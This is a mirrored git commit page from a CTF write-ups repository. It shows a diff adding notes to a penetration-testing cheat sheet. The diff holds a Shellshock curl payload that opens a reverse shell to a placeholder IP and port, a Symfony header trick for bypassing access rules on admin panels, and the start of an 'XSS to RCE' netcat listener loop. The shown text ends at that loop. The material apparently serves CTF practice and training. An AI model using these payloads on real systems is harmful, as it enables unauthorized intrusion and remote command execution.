Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-24 21:03:07 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update Cheat Sheet.md

Browse source
This commit is contained in:
ARZ 2021-12-02 16:54:37 +05:00 committed by GitHub
parent d5ff6fce86
commit 5e859397c5
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
Cheat Sheet.md
View file

@ -531,6 +531,12 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/IP/PORT 0>&1' http://Re
`use multi/http/apache_mod_cgi_bash_env_exec`
### Symfony / Frontend server rule bypass
If we have don't have access to an endpoint could be an admin panel , we can just request for a `/` and at that point in either `X-Original-URL` or ` X-Rewrite-Url`
https://githubmemory.com/repo/sting8k/BurpSuite_403Bypasser/issues/4
### XSS to RCE
```
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done